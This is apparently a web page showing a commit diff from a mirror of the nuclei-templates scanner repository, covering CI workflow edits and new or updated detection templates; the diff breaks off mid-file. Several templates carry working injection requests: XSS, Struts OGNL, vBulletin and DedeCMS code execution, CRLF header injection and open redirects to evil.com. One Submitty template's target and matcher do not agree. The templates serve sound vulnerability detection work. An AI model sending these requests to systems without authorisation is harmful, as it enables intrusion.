daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into patch-1

patch-1
Dhiyaneshwaran 2022-12-23 14:50:13 +05:30 committed by GitHub
parent 26ac7ce243 f9c773f0d7
commit 0597e2bbd4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
985 changed files with 21078 additions and 3610 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
.github/workflows/cve-annotate.yml vendored
View File

@ -15,12 +15,12 @@ jobs:
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
- name: Setup CVE annotate
if: steps.meta.outputs.tag != ''
if: steps.meta.outputs.TAG != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
VERSION: ${{ steps.meta.outputs.TAG }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
@ -30,10 +30,10 @@ jobs:
id: cve-annotate
run: |
cve-annotate -i . -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.cve-annotate.outputs.changes > 0
if: steps.cve-annotate.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
@ -42,7 +42,7 @@ jobs:
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes
if: steps.cve-annotate.outputs.changes > 0
if: steps.cve-annotate.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}

6
.github/workflows/readme-update.yml vendored
View File

@ -30,17 +30,17 @@ jobs:
id: readme-update
run: |
python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)"
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.readme-update.outputs.changes > 0
if: steps.readme-update.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto README Update [$(date)] :robot:" -a
- name: Push changes
if: steps.readme-update.outputs.changes > 0
if: steps.readme-update.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}

38
.github/workflows/template-checksum.yml vendored Normal file
View File

@ -0,0 +1,38 @@
name: 📝 Template Checksum
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
with:
go-version: 1.18
- name: install checksum generator
run: |
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
- name: generate checksum
run: |
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
- name: Commit files
run: |
git pull
git add templates-checksum.txt
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master

4
.github/workflows/template-db-indexer.yml vendored
View File

@ -14,7 +14,7 @@ jobs:
with:
go-version: 1.17
- name: Intalling Indexer
- name: Installing Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
@ -26,4 +26,4 @@ jobs:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode templates

6
.github/workflows/template-validate.yml vendored
View File

@ -11,12 +11,12 @@ jobs:
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
- name: Setup Nuclei
if: steps.meta.outputs.tag != ''
if: steps.meta.outputs.TAG != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
VERSION: ${{ steps.meta.outputs.TAG }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin

6
.github/workflows/templates-stats.yml vendored
View File

@ -13,7 +13,7 @@ jobs:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
with:
go-version: 1.17
go-version: 1.18
- name: Installing Template Stats
run: |
@ -37,10 +37,10 @@ jobs:
- name: Get statistical changes
id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)"
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.stats.outputs.changes > 0
if: steps.stats.outputs.CHANGES > 0
run: |
git add TEMPLATES-STATS.*
git add TOP-10.md

42
.new-additions
View File

@ -1,32 +1,10 @@
cves/2022/CVE-2022-22242.yaml
default-logins/xnat-default-login.yaml
exposed-panels/allied-telesis-exposure.yaml
exposed-panels/ampache-panel.yaml
exposed-panels/cisco/cisco-anyconnect-vpn.yaml
exposed-panels/connectwise-backup-manager.yaml
exposed-panels/gira-homeserver-homepage.yaml
exposed-panels/hangfire-dashboard.yaml
exposed-panels/nginx-admin-panel.yaml
exposed-panels/nginx-ui-dashboard.yaml
exposed-panels/nport-web-console.yaml
exposed-panels/xnat-login.yaml
misconfiguration/debug/ampache-debug.yaml
misconfiguration/debug/flask-werkzeug-debug.yaml
misconfiguration/debug/github-debug.yaml
misconfiguration/global-traffic-statistics.yaml
misconfiguration/healthchecks-ui-exposure.yaml
misconfiguration/hfs-exposure.yaml
misconfiguration/installer/ampache-music-installer.yaml
misconfiguration/installer/moodle-installer.yaml
misconfiguration/installer/sms-installer.yaml
misconfiguration/questdb-console.yaml
misconfiguration/qvidium-management-system-exposed.yaml
misconfiguration/rekognition-image-validation.yaml
misconfiguration/smarterstats-setup.yaml
network/detection/axigen-mail-server-detect.yaml
network/detection/riak-detect.yaml
technologies/catalog-creator-detect.yaml
technologies/coming-soon-page-detect.yaml
technologies/google/cloud-run-default-page.yaml
technologies/php-detect.yaml
technologies/vivotex-web-console-detect.yaml
cves/2022/CVE-2022-0786.yaml
cves/2022/CVE-2022-25082.yaml
exposed-panels/creatio-login-panel.yaml
exposed-panels/posthog-admin-panel.yaml
exposed-panels/webuzo-admin-panel.yaml
exposed-panels/xfinity-panel.yaml
iot/carel-plantvisor-panel.yaml
iot/hue-personal-wireless-panel.yaml
network/exposed-dockerd.yaml
technologies/aws/amazon-ec2-detect.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1504 | dhiyaneshdk | 677 | cves | 1482 | info | 1579 | http | 4129 |
| panel | 721 | daffainfo | 656 | exposed-panels | 727 | high | 1118 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 518 | medium | 810 | network | 63 |
| xss | 525 | pdteam | 273 | misconfiguration | 305 | critical | 532 | dns | 17 |
| lfi | 517 | geeknik | 196 | technologies | 299 | low | 242 | | |
| exposure | 487 | dwisiswant0 | 171 | exposures | 299 | unknown | 20 | | |
| wordpress | 453 | 0x_akoko | 167 | token-spray | 235 | | | | |
| cve2021 | 363 | pussycat0x | 151 | workflows | 190 | | | | |
| wp-plugin | 348 | princechaddha | 151 | default-logins | 110 | | | | |
| rce | 342 | ritikchaddha | 149 | file | 77 | | | | |
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
**306 directories, 4520 files**.
**328 directories, 4791 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

4417
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1504 | dhiyaneshdk | 677 | cves | 1482 | info | 1579 | http | 4129 |
| panel | 721 | daffainfo | 656 | exposed-panels | 727 | high | 1118 | file | 77 |
| edb | 574 | pikpikcu | 338 | vulnerabilities | 518 | medium | 810 | network | 63 |
| xss | 525 | pdteam | 273 | misconfiguration | 305 | critical | 532 | dns | 17 |
| lfi | 517 | geeknik | 196 | technologies | 299 | low | 242 | | |
| exposure | 487 | dwisiswant0 | 171 | exposures | 299 | unknown | 20 | | |
| wordpress | 453 | 0x_akoko | 167 | token-spray | 235 | | | | |
| cve2021 | 363 | pussycat0x | 151 | workflows | 190 | | | | |
| wp-plugin | 348 | princechaddha | 151 | default-logins | 110 | | | | |
| rce | 342 | ritikchaddha | 149 | file | 77 | | | | |
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |

11
contributors.json
View File

@ -1368,5 +1368,16 @@
"website": "",
"email": ""
}
},
{
"author": "heywoodlh",
"links": {
"github": "https://www.github.com/heywoodlh",
"twitter": "",
"linkedin": "",
"website": "https://the-empire.systems",
"email": ""
}
}
]

47
cves/2008/CVE-2008-6465.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2008-6465
cwe-id: CWE-80
metadata:
verified: true
shodan-query: title:"Parallels H-Sphere
tags: cve,cve2008,xss,parallels,h-sphere
requests:
- method: GET
path:
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name &amp; password'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

3
vulnerabilities/other/devalcms-xss.yaml → cves/2008/CVE-2008-6982.yaml
View File

@ -13,10 +13,11 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-6982
cwe-id: CWE-79
metadata:
verified: "true"
tags: devalcms,xss,cms,edb
tags: cve,cve2008,devalcms,xss,cms,edb
requests:
- method: GET

39
cves/2012/CVE-2012-0394.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2012-0394
info:
name: Apache Struts Dev Mode OGNL Injection
author: tess
severity: critical
description: |
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
reference:
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
- https://www.exploit-db.com/exploits/31434
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
- http://www.exploit-db.com/exploits/18329
classification:
cve-id: CVE-2012-0394
metadata:
shodan-query: html:"Struts Problem Report"
verified: "true"
tags: ognl,injection,edb,cve,cve2012,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
second: "{{rand_int(1000, 9999)}}"
result: "{{to_number(first)*to_number(second)}}"
requests:
- method: GET
path:
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
matchers-condition: and
matchers:
- type: word
words:
- '{{result}}'
- type: status
status:
- 200

2
cves/2016/CVE-2016-10033.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2016-10033
info:
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
author: princechaddha
severity: critical
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.

80
cves/2017/CVE-2017-14186.yml → cves/2017/CVE-2017-14186.yaml
View File

@ -1,38 +1,42 @@
id: CVE-2017-14186
info:
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
author: johnk3r
severity: medium
description: |
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
classification:
cve-id: CVE-2017-14186
metadata:
verified: true
shodan-query: port:10443 http.favicon.hash:945408572
tags: cve,cve2017,fortigate,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
id: CVE-2017-14186
info:
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
author: johnk3r
severity: medium
description: |
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
- https://fortiguard.com/advisory/FG-IR-17-242
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-14186
cwe-id: CWE-79
metadata:
shodan-query: port:10443 http.favicon.hash:945408572
verified: "true"
tags: cve,cve2017,fortigate,xss,fortinet
requests:
- method: GET
path:
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

2
cves/2017/CVE-2017-17736.yaml
View File

@ -40,4 +40,4 @@ requests:
- "SQLServer"
condition: and
# Enhanced by cs on 2022/10/06
# Enhanced by cs on 2022/10/24

2
cves/2017/CVE-2017-8917.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
- http://www.securitytracker.com/id/1038522
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

2
cves/2018/CVE-2018-1000861.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-1000861
cwe-id: CWE-502
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
tags: kev,vulhub,cve,cve2018,rce,jenkins
requests:
- method: GET

2
cves/2018/CVE-2018-14912.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-14912
info:
name: cgit < 1.2.1 Directory Traversal
name: cgit < 1.2.1 - Directory Traversal
author: 0x_Akoko
severity: high
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.

17
cves/2018/CVE-2018-17422.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-17422
info:
name: dotCMS <5.0.2 - Open Redirect
name: DotCMS < 5.0.2 - Open Redirect
author: 0x_Akoko,daffainfo
severity: medium
description: |
@ -16,27 +16,22 @@ info:
cve-id: CVE-2018-17422
cwe-id: CWE-601
metadata:
verified: true
shodan-query: http.title:"dotCMS"
verified: "true"
tags: cve,cve2018,redirect,dotcms
requests:
- method: GET
path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "self.location = 'http://www.interact.sh'"
- type: status
status:
- 200
- "self.location = 'http://evil.com'"
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
# Enhanced by md on 2022/10/13

2
cves/2018/CVE-2018-20526.yaml
View File

@ -78,4 +78,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/10/06
# Enhanced by mp on 2022/10/07

6
cves/2018/CVE-2018-7700.yaml
View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
matchers-condition: and
matchers:
@ -27,9 +27,7 @@ requests:
- type: word
part: body
words:
- "phpinfo"
- "PHP Version"
condition: and
- "4cc32a3a81d2bb37271934a48ce4468a"
- type: status
status:

2
cves/2019/CVE-2019-10232.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-10232
info:
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil
severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature

2
cves/2019/CVE-2019-12314.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 Local File Inclusion
name: Deltek Maconomy 2.2.5 - Local File Inclusion
author: madrobot
severity: critical
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.

2
cves/2019/CVE-2019-12725.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
name: Zeroshell 3.9.0 - Remote Command Execution
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

2
cves/2019/CVE-2019-13101.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-13101
info:
name: D-Link DIR-600M Authentication Bypass
name: D-Link DIR-600M - Authentication Bypass
author: Suman_Kar
severity: critical
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.

2
cves/2019/CVE-2019-13392.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.

2
cves/2019/CVE-2019-15107.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-15107
info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
author: bp0lr
severity: critical
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.

2
cves/2019/CVE-2019-16313.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 Credential Discovery
name: ifw8 Router ROM v4.31 - Credential Discovery
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.

2
cves/2019/CVE-2019-16662.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-16662
info:
name: rConfig 3.9.2 Remote Code Execution
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

17
cves/2019/CVE-2019-16759.yaml
View File

@ -15,7 +15,10 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16759
cwe-id: CWE-94
tags: rce,kev,seclists,cve,cve2019,vbulletin
metadata:
shodan-query: http.component:"vBulletin"
verified: "true"
tags: cve,cve2019,rce,kev,seclists,vbulletin
requests:
- raw:
@ -24,15 +27,15 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
matchers-condition: and
matchers:
- type: word
words:
- "addcc9f9f2f40e2e6aca3079b73d9d17"
- type: status
status:
- 200
- type: word
words:
- "PHP Version"
# Enhanced by mp on 2022/03/29

3
cves/2019/CVE-2019-2729.yaml
View File

@ -12,9 +12,10 @@ info:
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-2729
cwe-id: CWE-284
tags: cve,cve2019,oracle,rce,weblogic
requests:

2
cves/2019/CVE-2019-3911.yaml
View File

@ -9,7 +9,7 @@ info:
- https://www.tenable.com/security/research/tra-2019-03
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3911
cwe-id: CWE-79

2
cves/2019/CVE-2019-3912.yaml
View File

@ -10,7 +10,7 @@ info:
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-3912
cwe-id: CWE-601

32
cves/2019/CVE-2019-6802.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2019-6802
info:
name: Pypiserver 1.2.5 - CRLF Injection
author: 0x_Akoko
severity: medium
description: |
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
reference:
- https://vuldb.com/?id.130257
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
- https://github.com/pypiserver/pypiserver/issues/237
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-6802
cwe-id: CWE-79,CWE-74
metadata:
shodan-query: html:"pypiserver"
verified: "true"
tags: cve,cve2019,crlf,generic,pypiserver
requests:
- method: GET
path:
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
matchers:
- type: word
part: header
words:
- 'Set-Cookie: crlfinjection=1;'

2
cves/2020/CVE-2020-10546.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-10546
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,

2
cves/2020/CVE-2020-10547.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-10547
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

3
cves/2020/CVE-2020-11110.yaml
View File

@ -7,9 +7,10 @@ info:
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
reference:
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
- https://github.com/grafana/grafana/pull/23254
- https://security.netapp.com/advisory/ntap-20200810-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
- https://hackerone.com/reports/1329433
remediation: This issue can be resolved by updating Grafana to the latest version.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

2
cves/2020/CVE-2020-11991.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
name: Apache Cocoon 2.1.12 - XML Injection
author: pikpikcu
severity: high
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.

34
cves/2020/CVE-2020-13121.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2020-13121
info:
name: Submitty 20.04.01 - Open redirect
author: 0x_Akoko
severity: medium
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
reference:
- https://github.com/Submitty/Submitty/issues/5265
- https://www.cvedetails.com/cve/CVE-2020-13121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-13121
cwe-id: CWE-601
tags: cve,cve2020,redirect,submitty,oos
requests:
- raw:
- |
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/authentication/login
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
cves/2020/CVE-2020-13700.yaml
View File

@ -1,7 +1,7 @@
